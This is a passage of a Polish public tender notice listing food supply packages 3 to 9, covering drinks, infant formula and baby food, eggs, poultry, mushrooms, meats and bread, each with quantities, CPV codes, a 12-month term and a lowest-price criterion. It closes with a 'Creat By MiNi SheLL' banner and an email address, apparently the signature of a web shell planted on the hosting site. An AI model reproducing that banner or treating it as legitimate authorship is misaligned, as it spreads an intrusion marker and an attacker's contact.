<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów spożywczych:
Napój 1,5l np.. Go-Go Cola	szt	100
Napój 1,5l np.. Go-Go Lemon 	szt	100
Napój  0,5l np.. Go-Go Orange 	szt	100
Napój zielony banan 1l 	szt	100
Napój 1,5l np.. Go-Go Orange 	szt	100
Sok a 0,33l np.. Kubuś 	szt	450
Sok a 0,75l np.. Kubuś 	szt	250
Napój  0,2l np. cymes	szt	800
Napój  250ml np.. Frugo	szt	500
Napój  0,5l np.. Hop	szt	300
Napój 1,5l np. Hop	szt	150
Napój jabłkowo-brzoskwiniowy 0,2l	szt	200
Napój jabłkowy 0,2l	szt	150
Napój pomarańczowo-brzoskwiniowy 0,2l	szt	150
Napój pomarańczowy 0,2l	szt	120
Napój winogronowy 0,2l	szt	120
 Napój 500ml np.. Nestle Pech różne smaki 	szt	400
Napój 0,5l l np.. Lipton różne smaki	szt	350
Nektar czarna porzeczka 0,3l 	szt	200
Napój 05,l np.. Pepsi Cola 	szt	650
Napój 0,33l np.. Pepsi Cola	szt	200
Napój 1l np.. Pepsi Cola 1l	szt	500
Sok 0,33l np.. Pysio 	szt	100
Sok 0,75l np.. Pysio 0,75l	szt	100
Sok do wody 0,5l, różne smaki	szt	250
Sok pomidorowy 1l np.. Tymbark 	szt	100
Sok czarna porzeczka a 1l	szt	250
Sok czarna porzeczka a0,2l	szt	100
Sok gejpfrutowy a 1l	szt	150
Sok jabłkowy 0,2l	szt	120
Sok jabłkowy a 1l	szt	200
Sok multiwita a 1l	szt	50
Sok pomarańczowy 0,2l	szt	50
Sok pomarańczowy a 1l	szt	100
Sok wieloowocowy a 1l	szt	100
Sok jabłko-pomarańcza 033l np. Tymbark 	szt	50
Sok  brzoskwiniowo-pomarańczowy 0,33l np.. Tymbark	szt	50
Sok czarna porzeczka 0,33l np.. Tymbark 	szt	50
Sok  jabłko-brzoskwinia 0,33l np.. Tymbark	szt	50
Sok jabłko-mięta 0,33l np.. Tymbark 	szt	50
Sok  jabłko-wiśnia 0,33l np.. Tymbark	szt	50
Napój  0,5l np.. Tymbark Pet	szt	200
Woda 1,5l np.. Veroni, Nałęczowianka, Jurajska, Cisowianka  smakowe 	szt	250
Woda 1,5l np.. Veroni, Nałęczowianka, Jurajska, Cisowianka  	szt	300
Woda 0,5l np.. Nałęczowinka , Veroni, Jurajska smakowa  	szt	300
Woda mineralna a 0,33l gazowana	szt	50
Woda mineralna a 0,33l niegazowana	szt	50
Woda mineralna a 0,5l np.. Muszynianka	szt	50
Woda mineralna a 1,5l niegazowana  np.. Muszynianka	szt	50
Woda mineralna a 1,5l  gazowana np..Cisowianka 	szt	70
Woda mineralna a 1,5l niegazowana np. Cisowianka, Nałęczowianka	szt	300
Woda mineralna a 1,5l niegazowana np..( Mama i Ja) dopuszczona do stosowania przez Instytut Matki i Dziecka	szt	700
Woda mineralna  0,5 l np.. Arctic, Nałęczowianka, 	szt	500
Woda mineralna  1,5 l np.. Arctic, Nałęczowianka	szt	300
Woda mineralna 0,5l np.. Niegazowana np.. Cisowianka	szt	200
Woda mineralna 0,5l np.. gazowana np.. Cisowianka	szt	200
Woda 0,5l np.. Żywiec Zdrój 	szt	100
Napój np.. Tymbark aseptic 0,5 l	szt	350
Oranżada różne smaki 1,5 l	szt	50
Sok np.. Cymes 0,2 l	szt	200
Woda 1,5l   smakowe	szt	100
Syrop malinowy a 420 ml	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-0, 03.14.25.00-3, 15.11.20.00-0, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
 Mieszanka mleczna z ryżem od 4 m-ca a 350g np.. Bebiko 2R	szt	60
 Mleko od 4 m-ca a 350g np.. Bebiko 2	szt	60
Mleko a 350 g od urodzenia np..Bebiko HA 1 	szt	20
Mleko a 350 g od 4 m-ca np..Bebiko HA 2 	szt	20
 Mleko następne od urodzenia a 350g np..Bebiko I	szt	70
 Mleko a 400g od urodzenia np..Bebilon HA 1	szt	10
 Mleko a 400g od 4 m-ca np.Bebilon HA 2	szt	20
Mleko od urodzenia 400g np..Bebilon I 	szt	50
Mleko od 4 m-ca a 400g np..Bebilon II	szt	50
Mleko modyfikowane dla niemowląt a 350g np.. Gerber1, Gerber2 	szt	15
Deser po 4 m-cu a 125g -130g np..Złociste jabłko 	szt	70
Deser jabłko ze słodką marchewką po 4 m-cu a 125g-130g	szt	100
Deser jabłka z delikatnym bananem po 4 m-cu a 125g-130g	szt	70
Deser jabłka i słoneczna brzoskwinia po 4 m-cu a 125g-130g	szt	70
Deser jabłka i łagodna morela z winogronami a 125g -130gpo 6 m-cu	szt	70
Deser sałatka z owoców lata po 6 m-cu a 125g-130g	szt	70
Deser jabłko , winogrona z różanym puree 125g-130g	szt	50
Deser jabłko i łagodna dynia po 4 m-cu a 125g-130g	szt	10
Deser marchew, jabłko od 5 m-ca a 130g-140g	szt	60
Kaszka mleczno-ryżowa od 5 m-ca a 200g -230g np.. Nestle	szt	80
Kaszka mleczno-ryzowa z brzoskwiniami a 250g od 10 m-ca	szt	25
Kaszka mleczno-ryzowa z morelami a 230g-250g od 10 m-ca	szt	25
Kaszka mleczno-ryżowa od 5 m-ca a 200g-230g	szt	100
Kaszka ryżowa z marchewką 250 g po 4 m-cu np.. Nestle	szt	30
Kaszka ryzowa z bananem a 180g np.. Bobowita	szt	100
Kaszka ryzowa z jabłkami od 5 m-ca a 200g np.. nestle	szt	30
Kaszka ryżowa z malinami od 5 m-ca a 180-200g	szt	25
Kleik kukurydziany  po 4-m-ca 170-200g np.. Nestle	szt	15
Kaszka ryżowo- kukurydziana a 170 g 	szt	20
Kleik ryżowy a 170 g np..Nestle 	szt	100
Kaszka ryżowa z jabłkami a 170-180g	szt	40
Kaszka mleczno ryżowa banan 170-230g	szt	100
Kaszka ryżowa z bananami 170-180g	szt	100
Kleik kukurydziany  od 5 m-ca a 170-190g np.. Nestle	szt	30
Marchewka delikatna a 125g	szt	50
Mleko od urodzenia a 350g np.. NAN I 	szt	120
 Mleko powyżej 6-m-ca życia a 350 g Nan II	szt	120
Mleko powyżej 6-m-ca życia a 350g np.. Nan IIR	szt	100
 Mleko od urodzenia a 400g np..NAN HA 1	szt	20
Mleko  a 400g pd 4 m-np.. NAN HA 2	szt	15
Mleko od 6 m-ca a 350g np..Nan II 	szt	100
Mleko następne z dodatkiem ryżu  a 350g od 6 m-ca np..NAN 2R	szt	80
Mleko początkowe i następne  od 0-5 m-ca a 350g np..Nan I	szt	130
Sok jabłko, morela,marchew od 7 m-ca a 175 ml	szt	100
Sok morelowo-jabłkowy a 175 ml od 7 m-ca	szt	80
Sok marchew jabłko a 175ml od 4 m-ca	szt	90
Sok marchew, jabłko, dynia i winogrona od 5 miesiąca  a 175 ml  od 5 m-ca	szt	95
Sok pachnące latem owoce (jagodowy) a 175 ml od 5 m-ca	szt	20
Sok winogrona, dzika róża i słodka malina 175 ml	szt	25
Sok winogrona i aromatyczna dzika róża a 175 ml	szt	30
Sok Jabłkowo-marchewkowy od 4-m-ca 250ml	szt	80
Sok z winogron, dzikiej róży i malin a 175 ml od 5 m-ca	szt	30
Warzywa w łagodnej potrawce z królikiem po 5 m-cu a 125g	szt	80
Warzywa z aromatycznym indykiem po 5 m-cu a 125g	szt	80
Zupa jarzynowa z kurczakiem od 6 m-ca a 140g np.. Bobowita	szt	90
Zupka jarzynowa ze świeżych warzyw po 4 m-cu a 125g	szt	80
Zupka jarzynowa z kurczakiem po 5 m-cu a 125g	szt	90
Zupka jarzynowa z delikatnym królikiem po 5 m-cu a 125g	szt	90
Aromatyczny rosołek z kurczakiem, z ryżem po 6 m-cu a 190g	szt	90
Zupka pomidorowa z łagodnym kurczakiem i ryżem po 6 m-cu a 190g	szt	30
Zupa marchew z ryżem od 5 m-ca a 140g 	szt	90
Zupa delikatna marchewka 125 g po 4 miesiącu 	szt	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Jajka klasa I a około 55g 	szt	85000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Kurczaki	kg	6200
Ćwiartka z kurczaka	kg	4200
Filet z indyka	kg	20
Filet z kurczaka	kg	1500
Kury mięsne świeże	kg	3000
Kury rosołowe swieże	kg	1400
Kury rosołowe mrożone	kg	500
Kury mięsne mrożone	kg	500
Podudzie z kurczaka	kg	70
Skrzydełka z kurczaka	kg	100
Udziec z indyka	kg	20
Udziec z kurczaka	kg	100
Wątróbka drobiowa	kg	420
Żołądki z kurczaka	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-0, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Pieczarki świeże	kg	1200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Baleron drobiowy	kg	20
Baleron wieprzowy	kg	20
Boczek wędzony	kg	100
Filet z indyka	kg	100
Kabanos wieprzowy	kg	10
Kaszanka	kg	140
Kiełbasa zwyczajna	kg	230
Kiełbasa szynkowa wieprzowa	kg	90
Kiełbasa wiejska	kg	50
Kiełbasa żywiecka	kg	50
Mielonka drobiowa	kg	450
Mielonka wieprzowa	kg	400
Ogonówka	kg	10
Parówka drobiowa	kg	3000
Parówka cielęca	kg	50
Parówka wieprzowa	kg	50
Pasztet pieczony	kg	40
Pasztetowa	kg	550
Salceson drobiowy	kg	200
Salceson wieprzowy	kg	380
Serdelki drobiowe	kg	50
Szynka drobiowa parzona	kg	1850
Szynka drobiowa prasowana np.. Dionizego	kg	300
Szynka gotowana wieprzowa	kg	25
Szynka wiejska	kg	20
Boczek surowy	kg	20
Cielęcina z kością	kg	20
Flaki wołowe mrożone (czyszczone i gotowane)	kg	120
Golonka wieprzowa	kg	50
Karczek wieprzowy b/k	kg	280
Karczek wieprzowy z/k	kg	50
Kotlet schabowy b/k	kg	800
Kotlet schabowy z kością 	kg	100
Pieczeń wieprzowa b/k	kg	200
Pieczeń wołowa I b/k	kg	150
Pieczeń wołowa II b/k	kg	200
Słonina	kg	550
Smalec	kg	300
Wątroba wieprzowa	kg	100
Wieprzowina I	kg	2500
Wieprzowina pieczeń b/k	kg	150
Wołowina antrykot	kg	150
Wołowina gulaszowe	kg	500
Wołowina rozbrat	kg	150
Wołowina z kością Kl I	kg	500
Żeberka wieprzowe	kg	50
Łopatka wieprzowa b/k	kg	650
Łopatka wieprzowa z/k	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa:
Bułka tarta	kg	1200,00
Bułki 100 g	szt	60000,00
Bułki 50g	szt	25000,00
Bułki kajzerki 50g	szt	3800,00
Bułka grahamka 100g	szt 	1000,00
Chałka 500g	szt	30,00
Chleb a 1 kg	szt	20000,00
Chleb bez soli 500g	szt	1200,00
Chleb bezglutenowy 500g	szt	100,00
Chleb graham  500g	szt	6200,00
Drożdże	kg	65,00
Drożdżówki (różne smaki)	szt	1200,00
Pączki różne smaki)	szt	1400,00
Rogale (paluchy) 80g	szt	900,00
Sezam	kg	25,00
Strucla z makiem 500g	szt	60,00
Bagietka 500g	szt	50,00
Weki 500g	szt	4000,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.84.21.00-3, 15.84.22.20-0, 15.32.00.00-0, 15.33.00.00-0, 15.50.00.00-3, 03.14.25.00-3, 15.11.20.00-6, 15.13.15.00-0, 03.22.12.60-0, 15.11.90.00-5, 15.13.11.30-5, 15.13.11.35-0, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com